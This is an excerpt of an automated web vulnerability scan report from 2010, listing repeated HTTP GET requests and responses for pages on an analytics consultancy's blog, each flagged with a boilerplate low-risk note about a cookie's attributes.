GET /blog/urchin.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:17:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:17:16 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:17:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24926
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:01:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:01:44 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:01:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:05:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:05:44 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:05:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:00:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:00:02 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:00:02 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:49 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:23 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/88-urchin-vs-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:20 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29615
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:54 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/webanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:17:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:18:02 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:18:02 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/webanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/content/article/62-urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:29:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:29:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:29:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/content/article/62-urchin/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:45:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:45:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:45:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:10:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:10:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:10:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/jsetup/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:44:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:44:41 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:44:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
